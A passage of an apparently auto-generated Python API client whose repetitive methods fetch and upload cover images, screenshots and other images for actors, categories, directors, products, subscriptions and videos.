>>> pprint(response)
>>>
>>> thread = api.get_director_cover_image_with_http_info(director_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int director_id: Director ID to fetch (required)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['director_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_director_cover_image" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'director_id' is set
if ('director_id' not in params) or (params['director_id'] is None):
raise ValueError("Missing the required parameter `director_id` when calling `get_director_cover_image`")
collection_formats = {}
resource_path = '/directors/{director_id}/cover'.replace('{format}', 'json')
path_params = {}
if 'director_id' in params:
path_params['director_id'] = params['director_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiClientId', 'ApiClientSecret']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Image',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_product_cover_image(self, product_id, **kwargs):
"""
Get cover image of a product
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_product_cover_image(product_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int product_id: Product ID to fetch (required)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_product_cover_image_with_http_info(product_id, **kwargs)
else:
(data) = self.get_product_cover_image_with_http_info(product_id, **kwargs)
return data
def get_product_cover_image_with_http_info(self, product_id, **kwargs):
"""
Get cover image of a product
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_product_cover_image_with_http_info(product_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int product_id: Product ID to fetch (required)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['product_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_product_cover_image" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'product_id' is set
if ('product_id' not in params) or (params['product_id'] is None):
raise ValueError("Missing the required parameter `product_id` when calling `get_product_cover_image`")
collection_formats = {}
resource_path = '/products/{product_id}/cover'.replace('{format}', 'json')
path_params = {}
if 'product_id' in params:
path_params['product_id'] = params['product_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiClientId', 'ApiClientSecret']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Image',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_product_image_types(self, **kwargs):
"""
Get image types for products
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_product_image_types(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: list[ImageType]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_product_image_types_with_http_info(**kwargs)
else:
(data) = self.get_product_image_types_with_http_info(**kwargs)
return data
def get_product_image_types_with_http_info(self, **kwargs):
"""
Get image types for products
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_product_image_types_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: list[ImageType]
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_product_image_types" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/products/image-types'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiClientId', 'ApiClientSecret']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[ImageType]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_product_images(self, product_id, **kwargs):
"""
Get images attached to product
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_product_images(product_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int product_id: Product ID to fetch (required)
:param str type: Filter on specific Image type
:param int page:
:param int per_page:
:return: CategoryImagesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_product_images_with_http_info(product_id, **kwargs)
else:
(data) = self.get_product_images_with_http_info(product_id, **kwargs)
return data
def get_product_images_with_http_info(self, product_id, **kwargs):
"""
Get images attached to product
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_product_images_with_http_info(product_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int product_id: Product ID to fetch (required)
:param str type: Filter on specific Image type
:param int page:
:param int per_page:
:return: CategoryImagesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['product_id', 'type', 'page', 'per_page']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_product_images" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'product_id' is set
if ('product_id' not in params) or (params['product_id'] is None):
raise ValueError("Missing the required parameter `product_id` when calling `get_product_images`")
collection_formats = {}
resource_path = '/products/{product_id}/images'.replace('{format}', 'json')
path_params = {}
if 'product_id' in params:
path_params['product_id'] = params['product_id']
query_params = {}
if 'type' in params:
query_params['type'] = params['type']
if 'page' in params:
query_params['page'] = params['page']
if 'per_page' in params:
query_params['per_page'] = params['per_page']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiClientId', 'ApiClientSecret']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CategoryImagesResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_product_screenshots(self, product_id, **kwargs):
"""
Get product screenshots
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_product_screenshots(product_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int product_id: Product ID to fetch (required)
:return: list[Image]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_product_screenshots_with_http_info(product_id, **kwargs)
else:
(data) = self.get_product_screenshots_with_http_info(product_id, **kwargs)
return data
def get_product_screenshots_with_http_info(self, product_id, **kwargs):
"""
Get product screenshots
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_product_screenshots_with_http_info(product_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int product_id: Product ID to fetch (required)
:return: list[Image]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['product_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_product_screenshots" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'product_id' is set
if ('product_id' not in params) or (params['product_id'] is None):
raise ValueError("Missing the required parameter `product_id` when calling `get_product_screenshots`")
collection_formats = {}
resource_path = '/products/{product_id}/screenshots'.replace('{format}', 'json')
path_params = {}
if 'product_id' in params:
path_params['product_id'] = params['product_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiClientId', 'ApiClientSecret']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Image]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_slider_image(self, **kwargs):
"""
Get slider images
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_slider_image(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: list[Image]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_slider_image_with_http_info(**kwargs)
else:
(data) = self.get_slider_image_with_http_info(**kwargs)
return data
def get_slider_image_with_http_info(self, **kwargs):
"""
Get slider images
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_slider_image_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: list[Image]
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_slider_image" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/widgets/slider/images'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiClientId', 'ApiClientSecret']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Image]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_subscription_cover_image(self, subscription_id, **kwargs):
"""
Get cover image of a subscription
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_subscription_cover_image(subscription_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int subscription_id: Subscription ID to fetch (required)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_subscription_cover_image_with_http_info(subscription_id, **kwargs)
else:
(data) = self.get_subscription_cover_image_with_http_info(subscription_id, **kwargs)
return data
def get_subscription_cover_image_with_http_info(self, subscription_id, **kwargs):
"""
Get cover image of a subscription
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_subscription_cover_image_with_http_info(subscription_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int subscription_id: Subscription ID to fetch (required)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['subscription_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_subscription_cover_image" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'subscription_id' is set
if ('subscription_id' not in params) or (params['subscription_id'] is None):
raise ValueError("Missing the required parameter `subscription_id` when calling `get_subscription_cover_image`")
collection_formats = {}
resource_path = '/subscriptions/{subscription_id}/cover'.replace('{format}', 'json')
path_params = {}
if 'subscription_id' in params:
path_params['subscription_id'] = params['subscription_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiClientId', 'ApiClientSecret']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Image',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_video_cover(self, video_id, **kwargs):
"""
Get video cover
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_video_cover(video_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int video_id: Video ID to fetch (required)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_video_cover_with_http_info(video_id, **kwargs)
else:
(data) = self.get_video_cover_with_http_info(video_id, **kwargs)
return data
def get_video_cover_with_http_info(self, video_id, **kwargs):
"""
Get video cover
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_video_cover_with_http_info(video_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int video_id: Video ID to fetch (required)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['video_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_video_cover" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'video_id' is set
if ('video_id' not in params) or (params['video_id'] is None):
raise ValueError("Missing the required parameter `video_id` when calling `get_video_cover`")
collection_formats = {}
resource_path = '/videos/{video_id}/cover'.replace('{format}', 'json')
path_params = {}
if 'video_id' in params:
path_params['video_id'] = params['video_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiClientId', 'ApiClientSecret']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Image',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def upload_actor_cover(self, actor_id, file, hash, **kwargs):
"""
Upload actor cover
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.upload_actor_cover(actor_id, file, hash, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param float actor_id: Actor ID to fetch (required)
:param file file: (required)
:param str hash: (required)
:param str hash_algorithm: Hash algorithm to check the hash file (default value is: sha256)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.upload_actor_cover_with_http_info(actor_id, file, hash, **kwargs)
else:
(data) = self.upload_actor_cover_with_http_info(actor_id, file, hash, **kwargs)
return data
def upload_actor_cover_with_http_info(self, actor_id, file, hash, **kwargs):
"""
Upload actor cover
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.upload_actor_cover_with_http_info(actor_id, file, hash, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param float actor_id: Actor ID to fetch (required)
:param file file: (required)
:param str hash: (required)
:param str hash_algorithm: Hash algorithm to check the hash file (default value is: sha256)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['actor_id', 'file', 'hash', 'hash_algorithm']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method upload_actor_cover" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'actor_id' is set
if ('actor_id' not in params) or (params['actor_id'] is None):
raise ValueError("Missing the required parameter `actor_id` when calling `upload_actor_cover`")
# verify the required parameter 'file' is set
if ('file' not in params) or (params['file'] is None):
raise ValueError("Missing the required parameter `file` when calling `upload_actor_cover`")
# verify the required parameter 'hash' is set
if ('hash' not in params) or (params['hash'] is None):
raise ValueError("Missing the required parameter `hash` when calling `upload_actor_cover`")
collection_formats = {}
resource_path = '/actors/{actor_id}/cover'.replace('{format}', 'json')
path_params = {}
if 'actor_id' in params:
path_params['actor_id'] = params['actor_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
if 'file' in params:
local_var_files['file'] = params['file']
self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
if 'hash' in params:
form_params.append(('hash', params['hash']))
self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
if 'hash_algorithm' in params:
form_params.append(('hash-algorithm', params['hash_algorithm']))
self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
body_params = None
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['multipart/form-data'])
# Authentication setting
auth_settings = ['ApiClientId', 'ApiClientSecret']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Image',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def upload_category_cover(self, category_id, file, hash, **kwargs):
"""
Upload Category cover
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.upload_category_cover(category_id, file, hash, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param float category_id: Category ID to fetch (required)
:param file file: (required)
:param str hash: (required)
:param str hash_algorithm: Hash algorithm to check the hash file (default value is: sha256)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.upload_category_cover_with_http_info(category_id, file, hash, **kwargs)
else:
(data) = self.upload_category_cover_with_http_info(category_id, file, hash, **kwargs)
return data
def upload_category_cover_with_http_info(self, category_id, file, hash, **kwargs):
"""
Upload Category cover
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.upload_category_cover_with_http_info(category_id, file, hash, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param float category_id: Category ID to fetch (required)
:param file file: (required)
:param str hash: (required)
:param str hash_algorithm: Hash algorithm to check the hash file (default value is: sha256)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['category_id', 'file', 'hash', 'hash_algorithm']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method upload_category_cover" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'category_id' is set
if ('category_id' not in params) or (params['category_id'] is None):
raise ValueError("Missing the required parameter `category_id` when calling `upload_category_cover`")
# verify the required parameter 'file' is set
if ('file' not in params) or (params['file'] is None):
raise ValueError("Missing the required parameter `file` when calling `upload_category_cover`")
# verify the required parameter 'hash' is set
if ('hash' not in params) or (params['hash'] is None):
raise ValueError("Missing the required parameter `hash` when calling `upload_category_cover`")
collection_formats = {}
resource_path = '/categories/{category_id}/cover'.replace('{format}', 'json')
path_params = {}
if 'category_id' in params:
path_params['category_id'] = params['category_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
if 'file' in params:
local_var_files['file'] = params['file']
self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
if 'hash' in params:
form_params.append(('hash', params['hash']))
self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
if 'hash_algorithm' in params:
form_params.append(('hash-algorithm', params['hash_algorithm']))
self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
body_params = None
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['multipart/form-data'])
# Authentication setting
auth_settings = ['ApiClientId', 'ApiClientSecret']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Image',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def upload_category_image(self, category_id, file, hash, image_type_name, **kwargs):
"""
Upload Category image
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.upload_category_image(category_id, file, hash, image_type_name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param float category_id: Category ID to fetch (required)
:param file file: (required)
:param str hash: (required)
:param str image_type_name: Image types name to use to generate image assets (required)
:param str hash_algorithm: Hash algorithm to check the hash file (default value is: sha256)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.upload_category_image_with_http_info(category_id, file, hash, image_type_name, **kwargs)
else:
(data) = self.upload_category_image_with_http_info(category_id, file, hash, image_type_name, **kwargs)
return data
def upload_category_image_with_http_info(self, category_id, file, hash, image_type_name, **kwargs):
"""
Upload Category image
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.upload_category_image_with_http_info(category_id, file, hash, image_type_name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param float category_id: Category ID to fetch (required)
:param file file: (required)
:param str hash: (required)
:param str image_type_name: Image types name to use to generate image assets (required)
:param str hash_algorithm: Hash algorithm to check the hash file (default value is: sha256)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['category_id', 'file', 'hash', 'image_type_name', 'hash_algorithm']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method upload_category_image" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'category_id' is set
if ('category_id' not in params) or (params['category_id'] is None):
raise ValueError("Missing the required parameter `category_id` when calling `upload_category_image`")
# verify the required parameter 'file' is set
if ('file' not in params) or (params['file'] is None):
raise ValueError("Missing the required parameter `file` when calling `upload_category_image`")
# verify the required parameter 'hash' is set
if ('hash' not in params) or (params['hash'] is None):
raise ValueError("Missing the required parameter `hash` when calling `upload_category_image`")
# verify the required parameter 'image_type_name' is set
if ('image_type_name' not in params) or (params['image_type_name'] is None):
raise ValueError("Missing the required parameter `image_type_name` when calling `upload_category_image`")
collection_formats = {}
resource_path = '/categories/{category_id}/image'.replace('{format}', 'json')
path_params = {}
if 'category_id' in params:
path_params['category_id'] = params['category_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
if 'file' in params:
local_var_files['file'] = params['file']
self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
if 'hash' in params:
form_params.append(('hash', params['hash']))
self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
if 'image_type_name' in params:
form_params.append(('image_type_name', params['image_type_name']))
self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
if 'hash_algorithm' in params:
form_params.append(('hash-algorithm', params['hash_algorithm']))
self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
body_params = None
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['multipart/form-data'])
# Authentication setting
auth_settings = ['ApiClientId', 'ApiClientSecret']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Image',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def upload_director_cover(self, director_id, file, hash, **kwargs):
"""
Upload director cover
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.upload_director_cover(director_id, file, hash, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param float director_id: Director ID to fetch (required)
:param file file: (required)
:param str hash: (required)
:param str hash_algorithm: Hash algorithm to check the hash file (default value is: sha256)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.upload_director_cover_with_http_info(director_id, file, hash, **kwargs)
else:
(data) = self.upload_director_cover_with_http_info(director_id, file, hash, **kwargs)
return data
def upload_director_cover_with_http_info(self, director_id, file, hash, **kwargs):
"""
Upload director cover
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.upload_director_cover_with_http_info(director_id, file, hash, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param float director_id: Director ID to fetch (required)
:param file file: (required)
:param str hash: (required)
:param str hash_algorithm: Hash algorithm to check the hash file (default value is: sha256)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['director_id', 'file', 'hash', 'hash_algorithm']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method upload_director_cover" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'director_id' is set
if ('director_id' not in params) or (params['director_id'] is None):
raise ValueError("Missing the required parameter `director_id` when calling `upload_director_cover`")
# verify the required parameter 'file' is set
if ('file' not in params) or (params['file'] is None):
raise ValueError("Missing the required parameter `file` when calling `upload_director_cover`")
# verify the required parameter 'hash' is set
if ('hash' not in params) or (params['hash'] is None):
raise ValueError("Missing the required parameter `hash` when calling `upload_director_cover`")
collection_formats = {}
resource_path = '/directors/{director_id}/cover'.replace('{format}', 'json')
path_params = {}
if 'director_id' in params:
path_params['director_id'] = params['director_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
if 'file' in params:
local_var_files['file'] = params['file']
self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
if 'hash' in params:
form_params.append(('hash', params['hash']))
self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
if 'hash_algorithm' in params:
form_params.append(('hash-algorithm', params['hash_algorithm']))
self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
body_params = None
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['multipart/form-data'])
# Authentication setting
auth_settings = ['ApiClientId', 'ApiClientSecret']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Image',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def upload_product_cover(self, product_id, file, hash, **kwargs):
"""
Upload product cover
